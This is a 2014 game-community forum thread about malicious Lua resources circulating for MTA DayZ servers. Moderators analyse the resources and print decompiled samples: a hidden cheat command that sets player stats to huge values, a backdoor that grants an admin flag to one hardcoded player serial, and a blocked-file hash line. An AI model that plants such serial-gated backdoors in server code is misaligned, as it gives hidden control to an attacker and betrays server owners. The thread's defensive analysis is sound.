MTA Team ccw Posted May 3, 2014 MTA Team Share Posted May 3, 2014 It has come to our attention that a malicious script targeting the MTA DayZ gamemode is in circulation. If you are an owner of a server running the MTA DayZ gamemode, then you must update your MTA server to the latest build (1.3.5-9.06371) Linux binaries from here: http://linux.multitheftauto.com/ Windows binaries from here: http://www.mtasa.com/ If you play on a server running the MTA DayZ gamemode, you can check the server version by using the command sver in the client console. If the server build is below 6371, nag the owner to update! Link to comment
Quited Posted May 3, 2014 Share Posted May 3, 2014 what malicious scripts ? do you mean cheats ? , or script that using redirectPlayer to redirect players in other servers ? and what this serial ? AddBlockedFileReason( "[b][color=#FF0000]5A5FD6E08D503A125C81BA26594B416A[/color][/b]", "Malicious" ); * From CResourceManager.cpp File. Link to comment
Woovie Posted May 3, 2014 Share Posted May 3, 2014 what malicious scripts ?do you mean cheats ? , or script that using redirectPlayer to redirect players in other servers ? and what this serial ? AddBlockedFileReason( "[b][color=#FF0000]5A5FD6E08D503A125C81BA26594B416A[/color][/b]", "Malicious" ); * From CResourceManager.cpp File. That's the serial of someone who was doing something bad, pretty obvious with the word "Malicious" The script had functions that did a range of things, from giving items to player teleporting, but the only visible function was one that gave you a list of cars. It was a popular script for MTA DayZ servers so that admins could keep track of stuff. Link to comment
Lawliet Posted May 3, 2014 Share Posted May 3, 2014 It has come to our attention that a malicious script targeting the MTA DayZ gamemode is in circulation. What exactly does "script" mean in this regard? Is it a resource you can enable/disable at any time or is it a third party program which exclusively targets MTA DayZ? Also, what exactly is said script trying to accomplish? Do I have to worry about compromised passwords, usernames, resources etc? Is this announcement an extension to this post by Woovie? EDIT: I see that Woovie has already answered my questions. We never used that particular resource, so we don't have to worry about anything...but rest assured, we will still update to the latest version once it's available for us. Link to comment
Quited Posted May 3, 2014 Share Posted May 3, 2014 (edited) That's the serial of someone who was doing something bad, pretty obvious with the word "Malicious ok , i have most serials doing something bad in MTA and this serial ? 5A5FD6E08D503A125C81BA26594B416A it is in blacklist ? Edited May 3, 2014 by Guest Link to comment
Woovie Posted May 3, 2014 Share Posted May 3, 2014 Yeah, that's why it was added to the source code ._. I thought that was pretty obvious. We have no reason otherwise to add someone to the source code. Link to comment
MTA Anti-Cheat Team Dutchman101 Posted May 3, 2014 MTA Anti-Cheat Team Share Posted May 3, 2014 Yeah, that's why it was added to the source code ._. I thought that was pretty obvious. We have no reason otherwise to add someone to the source code. It's not someone's serial. It's an hash of the malicious files (resource) so that MTA recognizes it. Link to comment
Quited Posted May 3, 2014 Share Posted May 3, 2014 It's not someone's serial. It's an hash of the malicious files (resource) so that MTA recognizes it. ok , if somebody can upload malicious resources on community , he can upload more and more Even if get banned. Link to comment
Woovie Posted May 3, 2014 Share Posted May 3, 2014 It's not someone's serial. It's an hash of the malicious files (resource) so that MTA recognizes it. ok , if somebody can upload malicious resources on community , he can upload more and more Even if get banned. Can you just stop posting? Link to comment
TheNormalnij Posted May 6, 2014 Share Posted May 6, 2014 http://pastebin.com/3uK5ixkG You can not monitor all malicious resources... Link to comment
Gallagher Posted May 23, 2014 Share Posted May 23, 2014 Hello" I found this script mta dayz, it is compiled, and has a addcommandhandler the script, I think it can do harm to the server can check for me? https://dl.dropboxusercontent.com/s/6ga ... 1400759763 Link to comment
Jusonex Posted May 23, 2014 Share Posted May 23, 2014 Yep, looks like that: function giveALLNOOBS() setElementData(getLocalPlayer(), "blood", 99999999999999) setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999) setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999) end addCommandHandler("mamka", giveALLNOOBS) Link to comment
Gallagher Posted May 23, 2014 Share Posted May 23, 2014 Yep, looks like that: function giveALLNOOBS() setElementData(getLocalPlayer(), "blood", 99999999999999) setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999) setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999) end addCommandHandler("mamka", giveALLNOOBS) I need to use this script, you could delete this scam and send me the file? Link to comment
Jusonex Posted May 23, 2014 Share Posted May 23, 2014 That's the decompiled Lua script: function load() for _FORV_3_, _FORV_4_ in pairs(_UPVALUE0_) do tex = engineLoadTXD("mods/" .. _FORV_4_.fileName .. ".txd", _FORV_4_.model) engineImportTXD(tex, _FORV_4_.model) mod = engineLoadDFF("mods/" .. _FORV_4_.fileName .. ".dff", _FORV_4_.model) engineReplaceModel(mod, _FORV_4_.model) txd = engineLoadTXD("mods/1.txd", 2726) engineImportTXD(txd, 2726) dff = engineLoadDFF("mods/1.dff", 2726) engineReplaceModel(dff, 2726) txd = engineLoadTXD("mods/2.txd", 2725) engineImportTXD(txd, 2725) dff = engineLoadDFF("mods/2.dff", 2725) engineReplaceModel(dff, 2725) txd = engineLoadTXD("mods/3.txd", 2644) engineImportTXD(txd, 2644) dff = engineLoadDFF("mods/3.dff", 2644) engineReplaceModel(dff, 2644) txd = engineLoadTXD("mods/4.txd", 2708) engineImportTXD(txd, 2708) dff = engineLoadDFF("mods/4.dff", 2708) engineReplaceModel(dff, 2708) txd = engineLoadTXD("mods/5.txd", 2571) engineImportTXD(txd, 2571) dff = engineLoadDFF("mods/5.dff", 2571) engineReplaceModel(dff, 2571) txd = engineLoadTXD("mods/6.txd", 2568) engineImportTXD(txd, 2568) dff = engineLoadDFF("mods/6.dff", 2568) engineReplaceModel(dff, 2568) txd = engineLoadTXD("mods/7.txd", 2565) engineImportTXD(txd, 2565) dff = engineLoadDFF("mods/7.dff", 2565) engineReplaceModel(dff, 2565) txd = engineLoadTXD("mods/8.txd", 2468) engineImportTXD(txd, 2468) dff = engineLoadDFF("mods/8.dff", 2468) engineReplaceModel(dff, 2468) txd = engineLoadTXD("mods/9.txd", 2562) engineImportTXD(txd, 2562) dff = engineLoadDFF("mods/9.dff", 2562) engineReplaceModel(dff, 2562) end end addEventHandler("onClientResourceStart", resourceRoot, function() setTimer(load, 1000, 1) end) function giveALLNOOBS() setElementData(getLocalPlayer(), "blood", 99999999999999) setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999) setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999) end addCommandHandler("mamka", giveALLNOOBS) Link to comment
Gallagher Posted May 23, 2014 Share Posted May 23, 2014 That's the decompiled Lua script: function load() for _FORV_3_, _FORV_4_ in pairs(_UPVALUE0_) do tex = engineLoadTXD("mods/" .. _FORV_4_.fileName .. ".txd", _FORV_4_.model) engineImportTXD(tex, _FORV_4_.model) mod = engineLoadDFF("mods/" .. _FORV_4_.fileName .. ".dff", _FORV_4_.model) engineReplaceModel(mod, _FORV_4_.model) txd = engineLoadTXD("mods/1.txd", 2726) engineImportTXD(txd, 2726) dff = engineLoadDFF("mods/1.dff", 2726) engineReplaceModel(dff, 2726) txd = engineLoadTXD("mods/2.txd", 2725) engineImportTXD(txd, 2725) dff = engineLoadDFF("mods/2.dff", 2725) engineReplaceModel(dff, 2725) txd = engineLoadTXD("mods/3.txd", 2644) engineImportTXD(txd, 2644) dff = engineLoadDFF("mods/3.dff", 2644) engineReplaceModel(dff, 2644) txd = engineLoadTXD("mods/4.txd", 2708) engineImportTXD(txd, 2708) dff = engineLoadDFF("mods/4.dff", 2708) engineReplaceModel(dff, 2708) txd = engineLoadTXD("mods/5.txd", 2571) engineImportTXD(txd, 2571) dff = engineLoadDFF("mods/5.dff", 2571) engineReplaceModel(dff, 2571) txd = engineLoadTXD("mods/6.txd", 2568) engineImportTXD(txd, 2568) dff = engineLoadDFF("mods/6.dff", 2568) engineReplaceModel(dff, 2568) txd = engineLoadTXD("mods/7.txd", 2565) engineImportTXD(txd, 2565) dff = engineLoadDFF("mods/7.dff", 2565) engineReplaceModel(dff, 2565) txd = engineLoadTXD("mods/8.txd", 2468) engineImportTXD(txd, 2468) dff = engineLoadDFF("mods/8.dff", 2468) engineReplaceModel(dff, 2468) txd = engineLoadTXD("mods/9.txd", 2562) engineImportTXD(txd, 2562) dff = engineLoadDFF("mods/9.dff", 2562) engineReplaceModel(dff, 2562) end end addEventHandler("onClientResourceStart", resourceRoot, function() setTimer(load, 1000, 1) end) function giveALLNOOBS() setElementData(getLocalPlayer(), "blood", 99999999999999) setElementData(getLocalPlayer(), "\208\144\208\191\209\130\208\181\209\135\208\186\208\176", 99999999999999) setElementData(getLocalPlayer(), "MAX_Slots", 99999999999999) end addCommandHandler("mamka", giveALLNOOBS) thank you friend Link to comment
StreetPunkRulez Posted June 4, 2014 Share Posted June 4, 2014 I heard there is other version of this hack with incluced bypass that detection method. Link to comment
Woovie Posted June 4, 2014 Share Posted June 4, 2014 I heard there is other version of this hack with incluced bypass that detection method. 1. This isn't a hack, it's a resource... 2. They can't bypass our "detection" since it's a script. Any compiled script we can decompile to check for these types of issues. Link to comment
Gallagher Posted June 20, 2014 Share Posted June 20, 2014 Hello! I use this resource on my server for dayz, but I think it has something malicious. can verify? https://mega.co.nz/#!nlB2gBQZ!u7Qr9JqZb ... bIVRWBw3Yg Link to comment
Jusonex Posted June 21, 2014 Share Posted June 21, 2014 It contains a backdoor: function get(player) if getPlayerSerial(player) == "DFD1A04C59E7CB85FF672E4CC759F9F4" then setElementData(player, "adminn", true) else cancelEvent() end end addCommandHandler("neves768m", get) Apart from that it's very insecure (excessive usage of element datas etc.) so I wouldn't recommand you to use it on your server. Link to comment
lopezloo Posted June 21, 2014 Share Posted June 21, 2014 Eh, guys like author of this script should be global banned by serial. Link to comment
Gallagher Posted June 21, 2014 Share Posted June 21, 2014 (edited) wow Edited June 22, 2014 by Guest Link to comment
Jusonex Posted June 21, 2014 Share Posted June 21, 2014 Server: http://pastebin.com/L702uDts Client: http://pastebin.com/qkJbAw7s Link to comment
Atton Posted July 20, 2014 Share Posted July 20, 2014 Yet another good reason to make encrypted work exclusively on one server http://pastebin.com/gBV2FHjW Link to comment
MrBugsFive Posted February 7, 2015 Share Posted February 7, 2015 Hello? You Check Here Files ?? http://www.mediafire.com/download/iz2fu ... ves768.rar Pass: neves768.com !! Please Check is Secure !! (File Create By Neves768 What Banned/Blocked of Forum by Script Malicius !!) @Jusonex Link to comment
Recommended Posts